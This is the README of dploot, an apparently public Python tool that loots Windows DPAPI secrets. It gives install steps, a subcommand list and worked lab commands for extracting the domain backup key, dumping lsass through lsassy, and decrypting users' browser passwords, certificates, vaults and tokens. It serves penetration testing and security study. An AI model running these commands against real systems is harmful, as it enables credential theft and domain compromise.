Dploot
DPAPI looting remotely and locally in Python
dploot
dploot is a Python rewrite of SharpDPAPI, written in C# by Harmj0y, which is itself a port of the DPAPI module of Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable from a Python interpreter and from a Linux environment.
If you don't know what DPAPI is, check out this post.
Installation
You can install dploot directly from PyPI with pipx:
pipx install git+https://github.com/zblurx/dploot.git
OR
pipx install dploot
On Kali Linux, you can install dploot from the repositories:
sudo apt install python3-dploot
Usage
dploot (https://github.com/zblurx/dploot) v3.1.2 by @_zblurx
usage: dploot [-h]
{backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi} ...
DPAPI looting locally remotely in Python
positional arguments:
{backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
Action
backupkey Backup Keys from domain controller
blob Decrypt DPAPI blob. Can fetch masterkeys on target
browser Dump users credentials and cookies saved in browser from local or remote target
certificates Dump users certificates from local or remote target
credentials Dump users Credential Manager blob from local or remote target
machinecertificates
Dump system certificates from local or remote target
machinecredentials Dump system credentials from local or remote target
machinemasterkeys Dump system masterkey from local or remote target
machinetriage Loot SYSTEM Masterkeys (if not set), SYSTEM credentials, SYSTEM certificates and SYSTEM vaults from local or remote target
machinevaults Dump system vaults from local or remote target
masterkeys Dump users masterkey from local or remote target
mobaxterm Dump Passwords and Credentials from MobaXterm
rdg Dump users saved password information for RDCMan.settings from local or remote target
sccm Dump SCCM secrets (NAA, Collection variables, tasks sequences credentials) from local or remote target
triage Loot Masterkeys (if not set), credentials, rdg, certificates, browser and vaults from local or remote target
vaults Dump users Vaults blob from local or remote target
wam Dump users cached azure tokens from local or remote target
wifi Dump wifi profiles from local or remote target
options:
-h, --help show this help message and exit
Kerberos
dploot can authenticate with Kerberos. Simply use the -k option. If you want to use a cached ticket, use the -use-kcache option.
How to use
The goal of dploot is to simplify DPAPI-related looting from a Linux box. As with SharpDPAPI, how you use this tool depends on whether you have compromised the domain or not.
As a local administrator on the machine
Whenever you are a local administrator of a Windows computer, you can loot machine secrets, for example with machinecertificates (or any other Machine Triage command, or the wifi command):
$ dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -quiet
[-] Writting certificate to DESKTOP-OJ3N8TJ.waza.local_796449B12B788ABA.pfx
With offline access to the Windows' filesystem
A different way of gaining local administrator access to a system is physical access: extracting the drive and mounting the filesystem directly on your machine. To use this mode, specify LOCAL as the target. By default the target filesystem is expected to be the current directory; you can specify a different path with -root:
$ dploot sccm -root /media/C_drive/ -t LOCAL
[*] Connected to LOCAL as \ (admin)
It can still be useful to give a valid username and password as arguments, which will be used to decrypt masterkeys (see the instructions in User Triage below):
$ dploot masterkeys -root /mnt -u bob -p Password -t LOCAL
[*] Connected to LOCAL as \bob (admin)
As a domain administrator (or equivalent)
If you have domain admin privileges, you can obtain the domain DPAPI backup key with the backupkey command. This key can decrypt any DPAPI masterkey for domain users and computers, and it never changes. Therefore, this key allows an attacker to loot any DPAPI-protected password related to a domain user.
To obtain the domain backup key, use the backupkey command:
$ dploot backupkey -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.112 -quiet
[-] Exporting domain backupkey to file key.pvk
Then you can loot any user secrets stored on a Windows domain-joined computer on the network, for example with the certificates command (or any other User Triage command):
$ dploot certificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -pvk key.pvk -quiet
[-] Writting certificate to jsmith_waza.local_C0F800ECBA7BE997.pfx
[-] Writting certificate to jsmith_waza.local_D0C73E2C04BEAAB0.pfx
[-] Writting certificate to m.scott_waza.local_EB9C21A5642D4EBD.pfx
Not as a domain administrator
If domain admin privileges have not been obtained (yet), Mimikatz' sekurlsa::dpapi command will retrieve DPAPI masterkey {GUID}:SHA1 mappings for any master keys (user and SYSTEM) loaded on a given system (tip: running dpapi::cache after key extraction will give you a nice table). If you convert these keys to a {GUID1}:SHA1 {GUID2}:SHA1... format, they can be supplied to dploot to triage the box. You can also use lsassy to harvest decrypted masterkeys:
$ lsassy -u Administrator -p 'Password!123' -d waza.local -t 192.168.56.14 -m rdrleakdiag -M masterkeys
[+] 192.168.56.14 Authentication successful
[+] 192.168.56.14 Lsass dumped in C:\Windows\Temp\ff32F.fon (57121318 Bytes)
[+] 192.168.56.14 Lsass dump deleted
[+] 192.168.56.14 WAZA\DESKTOP-OJ3N8TJ$ [NT] 0e43c22a4b09520cf79ca19a9e1bbec7 | [SHA1] 2ce587ab64aa3488c5ed412ca1e554d0f8e5a411
(snip)
[+] 192.168.56.14 5 masterkeys saved to /data/masterkeys
Then you can use this masterkey file to loot the targeted computer, for example with the browser command (or any other User Triage command):
$ dploot browser -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -mkfile /data/masterkeys
[*] Connected to 192.168.56.14 as waza.local\Administrator (admin)
[*] Triage Browser Credentials for ALL USERS
[MSEDGE LOGIN DATA]
URL:
Username: zblurx@gmail.com
Password: Waza1234
You can also dump masterkey hashes with the -hashes-outputfile option of dploot masterkeys.
Commands
User Triage
masterkeys
The masterkeys command will collect every user masterkey file and decrypt them with a -passwords FILE of user:password combos, -nthashes combos of user:nthash, or a -pvk PVKFILE domain backup key. It returns a set of masterkey {GUID}:SHA1 mappings. Note that it will also try the password or NT hash you used to connect to the target, even if you don't specify the corresponding options. You can additionally use -hashes-outputfile to write every masterkey hash in Hashcat/JtR format in order to crack the cleartext passwords.
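As an added illustration of the {GUID}:SHA1 mapping format this command returns and that -mkfile consumes (example code written for this README, not part of dploot or lsassy): a small Python parser that accepts entries separated by spaces or newlines, validates each one, and rejects malformed tokens. The function names are my own; the space-separated form is the one described in the "Not as a domain administrator" section, and one-entry-per-line is an assumption about how tools write the file.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the {GUID}:SHA1 format that dploot consumes via -mkfile.
# The three valid mappings are copied from the masterkeys output in this README;
# the last token is deliberately malformed to show how it is rejected.
SAMPLE_MKFILE = """\
{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a
{not-a-guid}:deadbeef
"""

# One entry: a braced GUID (8-4-4-4-12 hex), a colon, then the 40-hex-digit
# SHA1 of the decrypted masterkey.
ENTRY_RE = re.compile(
    r"^\{([0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12})\}:([0-9a-fA-F]{40})$"
)


def parse_masterkey_mappings(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return (mappings, rejected).

    mappings maps lowercase GUID -> lowercase SHA1; rejected lists every token
    that did not match the expected format. Entries may be separated by
    newlines or by spaces (assumption: both forms are treated alike).
    """
    mappings: Dict[str, str] = {}
    rejected: List[str] = []
    for token in text.split():
        m = ENTRY_RE.match(token)
        if not m:
            rejected.append(token)
            continue
        mappings[m.group(1).lower()] = m.group(2).lower()
    return mappings, rejected


def format_mkfile(mappings: Dict[str, str]) -> str:
    """Render mappings one per line with braces restored, sorted by GUID."""
    return "\n".join(f"{{{guid}}}:{sha1}" for guid, sha1 in sorted(mappings.items()))


if __name__ == "__main__":
    parsed, bad = parse_masterkey_mappings(SAMPLE_MKFILE)
    print(format_mkfile(parsed))
    print("rejected:", bad)
```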
With domain backupkey:
$ dploot masterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)
[*] Triage ALL USERS masterkeys
{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba
{68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a
With password:
$ cat passwords
jsmith:Password#123
$ dploot masterkeys -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -passwords passwords
[*] Connected to 192.168.56.14 as waza.local\jsmith
